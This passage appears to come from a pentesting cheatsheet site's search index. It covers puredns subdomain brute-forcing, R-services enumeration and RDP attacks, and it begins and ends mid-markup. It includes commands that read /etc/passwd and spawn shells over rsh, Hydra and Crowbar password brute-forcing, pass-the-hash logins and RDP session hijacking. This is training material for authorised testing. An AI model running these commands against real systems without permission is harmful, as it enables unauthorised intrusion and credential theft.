style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns bruteforce wordlist.txt example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Resolve a list of subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns resolve subdomains.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eResolver list file (required for speed)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--resolvers-trusted \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTrusted resolvers for wildcard detection\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-l \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRate limit (queries per second)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--bin \u0026lt;path\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePath to massdns binary\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite valid results to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wildcard-tests \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber of wildcard tests per domain (default: 10)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wildcard-batch \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSubdomains to test per batch\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--skip-wildcard-filter\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkip wildcard filtering\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--skip-validation\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkip validation step\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMassdns threads\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-q\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eQuiet mode\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic brute force with resolver list\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns bruteforce wordlist.txt example.com -r resolvers.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with rate limiting\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns bruteforce wordlist.txt example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -r resolvers.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -l \u003cspan style=\"color:#ae81ff\"\u003e1000\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with trusted resolvers for wildcard detection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns bruteforce wordlist.txt example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -r resolvers.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --resolvers-trusted trusted.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Save results to file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns bruteforce wordlist.txt example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -r resolvers.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -w results.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Resolve a list of subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns resolve subdomains.txt -r resolvers.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Resolve and save valid results\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns resolve subdomains.txt -r resolvers.txt -w resolved.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Skip wildcard filter (if you want all results)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns bruteforce wordlist.txt example.com \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -r resolvers.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --skip-wildcard-filter\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Quiet output (subdomains only to stdout)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epuredns bruteforce wordlist.txt example.com -r resolvers.txt -q\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"resolver-lists\"\u003eResolver Lists\u003c/h2\u003e\n\u003cp\u003ePublic resolver lists are essential for speed and accuracy:\u003c/p\u003e","title":"puredns"},{"content":"R-Services Enumeration Cheatsheet Default Ports:\nrexec: 512 (TCP) rlogin: 513 (TCP) rsh / rcp: 514 (TCP) rpcbind / portmapper: 111 (TCP/UDP) Note: R-services transmit data in cleartext and rely on IP-based trust. They are largely obsolete but still found in legacy Unix/Linux environments.\nDetection nmap -p 512-514 \u0026lt;ip\u0026gt; nmap -p 512-514 -sV \u0026lt;ip\u0026gt; nmap -p 111 \u0026lt;ip\u0026gt; rlogin # Login as current user rlogin \u0026lt;ip\u0026gt; # Login as specific user rlogin -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; rsh (Remote Shell) # Execute command remotely rsh \u0026lt;ip\u0026gt; \u0026lt;command\u0026gt; rsh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; whoami rsh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; cat /etc/passwd rsh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; /bin/bash rexec (Remote Exec) rexec \u0026lt;ip\u0026gt; -l \u0026lt;user\u0026gt; \u0026lt;command\u0026gt; rexec \u0026lt;ip\u0026gt; -l \u0026lt;user\u0026gt; id rpcbind / Portmapper (Port 111) # List all registered RPC services rpcinfo -p \u0026lt;ip\u0026gt; # List NFS mounts (if NFS is running) showmount -e \u0026lt;ip\u0026gt; # Nmap nmap -p 111 --script rpcinfo \u0026lt;ip\u0026gt; nmap -p 111 --script nfs-ls \u0026lt;ip\u0026gt; nmap -p 111 --script nfs-showmount \u0026lt;ip\u0026gt; nmap -p 111 --script nfs-statfs \u0026lt;ip\u0026gt; rwho / ruptime # List logged-in users across trusted hosts rwho # Show uptime across trusted hosts ruptime Trust Files (Critical Targets) These files define which hosts/users can connect without a password:\n# System-wide trust (any user from listed hosts) cat /etc/hosts.equiv # Per-user trust (~/.rhosts) cat ~/.rhosts cat /root/.rhosts # Format of trust files: # \u0026lt;hostname\u0026gt; — trust all users from this host # \u0026lt;hostname\u0026gt; \u0026lt;user\u0026gt; — trust specific user from this host # + + — trust EVERYONE (critical misconfiguration) Nmap Scripts nmap -p 512-514 --script rsh-brute \u0026lt;ip\u0026gt; nmap -p 111 --script rpcinfo \u0026lt;ip\u0026gt; nmap -p 111 --script nfs-ls,nfs-showmount,nfs-statfs \u0026lt;ip\u0026gt; Exploitation Flow 1. Scan for open ports 512-514 2. Check /etc/hosts.equiv and ~/.rhosts on any accessible system 3. If trusted host found, rlogin from that IP without password 4. Look for + + wildcard trust entries (full bypass) 5. If rsh available, execute commands directly ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/r-services/","summary":"\u003ch1 id=\"r-services-enumeration-cheatsheet\"\u003eR-Services Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erexec: 512 (TCP)\u003c/li\u003e\n\u003cli\u003erlogin: 513 (TCP)\u003c/li\u003e\n\u003cli\u003ersh / rcp: 514 (TCP)\u003c/li\u003e\n\u003cli\u003erpcbind / portmapper: 111 (TCP/UDP)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eNote:\u003c/strong\u003e R-services transmit data in cleartext and rely on IP-based trust. They are largely obsolete but still found in legacy Unix/Linux environments.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 512-514 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 512-514 -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e111\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"rlogin\"\u003erlogin\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Login as current user\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erlogin \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Login as specific user\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erlogin -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"rsh-remote-shell\"\u003ersh (Remote Shell)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Execute command remotely\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersh \u0026lt;ip\u0026gt; \u0026lt;command\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; whoami\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; cat /etc/passwd\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersh -l \u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; /bin/bash\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"rexec-remote-exec\"\u003erexec (Remote Exec)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erexec \u0026lt;ip\u0026gt; -l \u0026lt;user\u0026gt; \u0026lt;command\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erexec \u0026lt;ip\u0026gt; -l \u0026lt;user\u0026gt; id\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"rpcbind--portmapper-port-111\"\u003erpcbind / Portmapper (Port 111)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List all registered RPC services\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erpcinfo -p \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List NFS mounts (if NFS is running)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eshowmount -e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Nmap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e111\u003c/span\u003e --script rpcinfo \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e111\u003c/span\u003e --script nfs-ls \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e111\u003c/span\u003e --script nfs-showmount \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e111\u003c/span\u003e --script nfs-statfs \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"rwho--ruptime\"\u003erwho / ruptime\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List logged-in users across trusted hosts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erwho\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Show uptime across trusted hosts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eruptime\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"trust-files-critical-targets\"\u003eTrust Files (Critical Targets)\u003c/h2\u003e\n\u003cp\u003eThese files define which hosts/users can connect without a password:\u003c/p\u003e","title":"R Services"},{"content":"RDP Enumeration Cheatsheet Default Port: 3389 (TCP)\nDetection \u0026amp; Info Gathering nmap -p 3389 -sV \u0026lt;ip\u0026gt; nmap -p 3389 --script rdp-enum-encryption \u0026lt;ip\u0026gt; nmap -p 3389 --script rdp-vuln-ms12-020 \u0026lt;ip\u0026gt; nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info \u0026lt;ip\u0026gt; Check NLA (Network Level Auth) # If NLA is required, credential prompt appears BEFORE full connection nmap -p 3389 --script rdp-enum-encryption \u0026lt;ip\u0026gt; # Look for: \u0026#34;Security layer: NLA\u0026#34; or \u0026#34;CredSSP\u0026#34; # rdp_check.py (impacket) — tests credential validity python3 rdp_check.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; Password Attacks # Hydra hydra -l \u0026lt;user\u0026gt; -P wordlist.txt rdp://\u0026lt;ip\u0026gt; hydra -L users.txt -P wordlist.txt rdp://\u0026lt;ip\u0026gt; hydra -l \u0026lt;user\u0026gt; -P wordlist.txt rdp://\u0026lt;ip\u0026gt; -t 4 # Limit threads (RDP is picky) # Crowbar crowbar -b rdp -s \u0026lt;ip\u0026gt;/32 -u \u0026lt;user\u0026gt; -C wordlist.txt crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt # Metasploit use auxiliary/scanner/rdp/rdp_scanner set RHOSTS \u0026lt;ip\u0026gt; run Connecting via Linux # xfreerdp (recommended) xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /d:\u0026lt;domain\u0026gt; xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /drive:share,/tmp # Mount local dir xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /cert-ignore # Ignore cert errors xfreerdp /u:\u0026lt;user\u0026gt; /h:\u0026lt;nthash\u0026gt; /v:\u0026lt;ip\u0026gt; # Pass-the-Hash # rdesktop rdesktop \u0026lt;ip\u0026gt; rdesktop -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -d \u0026lt;domain\u0026gt; \u0026lt;ip\u0026gt; # Remmina (GUI) remmina -c rdp://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; Session Hijacking (Post-Exploitation) # List sessions (on Windows target) query session query user # Hijack disconnected session (as SYSTEM) tscon \u0026lt;session_id\u0026gt; /dest:\u0026lt;current_session\u0026gt; Key Vulnerabilities CVE Name Affected Systems Description CVE-2019-0708 BlueKeep Win7, WinXP, Server 2008 Pre-auth RCE via RDP CVE-2019-1181 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2019-1182 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2012-0002 MS12-020 Multiple DoS / potential code execution BlueKeep Check (Metasploit) use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RHOSTS \u0026lt;ip\u0026gt; run Useful Options # Custom RDP port xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt; # Enable clipboard sharing xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; +clipboard # Full screen xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /f # Dynamic resolution xfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /dynamic-resolution ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/rdp/","summary":"\u003ch1 id=\"rdp-enumeration-cheatsheet\"\u003eRDP Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 3389 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection--info-gathering\"\u003eDetection \u0026amp; Info Gathering\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e --script rdp-enum-encryption \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e --script rdp-vuln-ms12-020 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"check-nla-network-level-auth\"\u003eCheck NLA (Network Level Auth)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# If NLA is required, credential prompt appears BEFORE full connection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3389\u003c/span\u003e --script rdp-enum-encryption \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Look for: \u0026#34;Security layer: NLA\u0026#34; or \u0026#34;CredSSP\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# rdp_check.py (impacket) — tests credential validity\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 rdp_check.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"password-attacks\"\u003ePassword Attacks\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 